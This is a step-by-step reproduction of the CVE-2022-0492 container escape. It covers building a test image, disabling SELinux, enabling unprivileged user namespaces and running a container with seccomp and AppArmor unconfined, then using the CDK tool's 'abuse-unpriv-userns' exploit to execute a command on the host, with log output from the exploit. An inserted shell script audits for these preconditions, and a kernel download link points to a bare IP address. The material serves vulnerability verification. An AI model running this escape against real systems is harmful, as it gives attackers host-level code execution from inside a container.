1. Download the latest cdk release: https://github.com/cdk-team/CDK/releases
2. Build the image; the Dockerfile is as follows:
FROM ubuntu:20.04
LABEL MAINTAINER kmahyyg<16604643+kmahyyg@users.noreply.github.com>
RUN echo "nameserver 223.5.5.5" > /etc/resolv.conf
RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list && \
    apt update -y && \
    apt install -y ca-certificates wget curl nano strace ltrace socat libcap2-bin && \
    rm -rf /var/cache/apt
CMD ["/bin/bash", "-c", "sleep 9999"]
docker build -t rinchat/test:CVE-2022-0492 .
The image has already been pushed to the registry as rinchat/test:CVE-2022-0492; pulling it is enough.
3. Temporarily disable SELinux:
setenforce 0
Enable unprivileged user namespaces:
echo user.max_user_namespaces=15000 >/etc/sysctl.d/90-max_net_namespaces.conf
sysctl -p /etc/sysctl.d/90-max_net_namespaces.conf
The cdk binary is in the current directory.
4. docker run -d -v `pwd`:/test --security-opt "seccomp=unconfined" --security-opt "apparmor=unconfined" --name test rinchat/test:CVE-2022-0492
Use docker exec to run the following inside the container: ./cdk run abuse-unpriv-userns "touch /root/hacked"
Check whether the file /root/hacked now exists on the host. If it does, the vulnerability is present: a command issued from inside the container was executed on the host.
Log output when the vulnerability is present:
root@2de2c952ccf1:/test# ./cdk run abuse-unpriv-userns "touch /root/hacked"
2022/04/07 15:27:31 User-Defined Shell Payload: touch /root/hacked
2022/04/07 15:27:31 current cgroup for exploit: rdma
2022/04/07 15:27:31 user-defined shell payload is: touch /root/hacked
2022/04/07 15:27:31 Found hostpath: /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper
2022/04/07 15:27:31 generate shell exploit with user-input cmd:
touch /root/hacked
final shell exploit is:
#!/bin/sh
touch /root/hacked > /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper/cdk_cgres_XCXT
2022/04/07 15:27:31 shell script saved to /cdk_cgexp_XCXT.sh
2022/04/07 15:27:36 Execute Result:
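As an added audit helper (not part of the original write-up and not CDK code), the following POSIX shell functions check the two host conditions that steps 3 and 4 deliberately create: unprivileged user namespaces enabled, and containers running with seccomp or AppArmor set to unconfined. The `docker inspect` format string is my assumption for how to feed it live data; the sample lines are constructed.

```shell
#!/bin/sh
# Audit helper for the preconditions used in this reproduction.
# Added example, not part of the original write-up or of CDK.

# $1: value of /proc/sys/user/max_user_namespaces. 0 means unprivileged user
# namespaces are off, which removes the precondition that step 3 enables.
# Prints enabled/disabled/unknown; returns 1 when enabled, 0 when disabled.
userns_risk() {
    case "$1" in
        ''|*[!0-9]*) echo "unknown"; return 2 ;;
    esac
    if [ "$1" -gt 0 ]; then echo "enabled"; return 1; fi
    echo "disabled"; return 0
}

# stdin: one container per line, in the shape produced by (assumed format):
#   docker inspect --format '{{.Name}} {{join .HostConfig.SecurityOpt ","}}' $(docker ps -q)
# Prints every container name whose seccomp or AppArmor profile is unconfined,
# i.e. started the way step 4 starts the test container. Returns 1 if any found.
flag_unconfined() {
    found=0
    while IFS= read -r line; do
        name=${line%% *}
        opts=${line#* }
        [ "$opts" = "$line" ] && opts=""   # no SecurityOpt at all
        case ",$opts," in
            *",seccomp=unconfined,"*|*",apparmor=unconfined,"*)
                echo "$name"; found=1 ;;
        esac
    done
    return $found
}

# Constructed sample standing in for live docker inspect output.
SAMPLE_INSPECT='/test seccomp=unconfined,apparmor=unconfined
/web
/db apparmor=docker-default'

run_sample() {
    printf '%s\n' "$SAMPLE_INSPECT" | flag_unconfined || true
}

run_sample   # prints: /test
# Live check of this host, if the sysctl is exposed:
userns_risk "$(cat /proc/sys/user/max_user_namespaces 2>/dev/null)" || true
```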
Testing showed the bug is present on kernels 4.11 and above.
Kernel download link: http://193.49.22.109/elrepo/kernel/el7/x86_64/RPMS/
Docker version:
[root@localhost ~]# docker version
Client: Docker Engine - Community
 Version:           20.10.0
 API version:       1.41
 Go version:        go1.13.15
 Git commit:        7287ab3
 Built:             Tue Dec 8 18:54:00 2020
 OS/Arch:           linux/amd64
 Context:           default
 Experimental:      true
Server: Docker Engine - Community
 Engine:
  Version:          20.10.0
  API version:      1.41 (minimum version 1.12)
  Go version:       go1.13.15
  Git commit:       eeddea2
  Built:            Tue Dec 8 18:58:04 2020
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          v1.4.3
  GitCommit:        269548fa27e0089a8b8278fc4fc781d7f65a939b
 runc:
  Version:          1.0.0-rc92
  GitCommit:        ff819c7e9184c13b7c2607fe6c30ae19403a7aff
 docker-init:
  Version:          0.19.0
  GitCommit:        de40ad0